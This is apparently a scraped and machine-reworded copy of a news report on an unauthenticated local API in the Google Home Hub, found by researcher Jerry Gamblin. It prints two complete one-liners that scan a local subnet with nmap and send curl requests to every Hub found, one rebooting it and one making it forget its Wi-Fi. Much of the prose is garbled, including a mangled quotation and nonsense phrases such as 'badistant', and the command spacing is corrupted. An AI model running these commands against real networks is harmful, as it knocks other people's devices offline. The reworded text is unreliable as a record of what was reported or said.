[ad_1]
A security researcher says an undocumented API is responsible for a vulnerability that can crash the Google Home Hub badistant.
Flaw finder Jerry Gamblin says the security hole allows the device to be received by the network, requiring it to manual reconfiguration.
The problem, Gamblin said, stems from the Google Home's Hub's inclusion of a local API that had not previously been disclosed. This API can be called via the command line.
"Since none of these endpoints require authentication, it is trivial," Gamblin explained.
Gamblin explained that the curl requests can be used to carry out commands like showing basic system data or running a speed test. They can also show the currently configured network information.
More importantly, the API also allows you to get started from the Home Hub to reboot itself. It would not be possible to use the Home Hub unusable until the owner manually reconfigured it with the Google Home app.
Without further ado, here is the reboot code:
nmap --open -p 8008 192.168.1.0/24 | awk '/ is up / {print up}; {gsub (/ (| ) /, ""); up = $ NF} '| xargs -I% curl -Lv -H Content-Type: application / json --data-raw '{"params": "now"}' http: //%: 8008 / setup / reboot
And here is the delete network command:
nmap --open -p 8008 192.168.1.0/24 | awk '/ is up / {print up}; {gsub (/ (|) /, ""); up = $ NF} '| xargs -I% curl -Lv -H Content-Type: application / json --data-raw '{"wpa_id": 0}' http: //%: 8008 / setup / forget_wifi
We trust everyone will use these codes responsibly and with the most noble of intentions.
Needless to say, Gamblin is not impressed with the state of the Home Hub.
"Gamblin said," I am genuinely shocked by how poor the overall security of these devices are, "said Gamblin said.
"I usually would have done so, but they would have done so, but they would not have it."
Google did not return a request for comment on the matter. ®
Source link
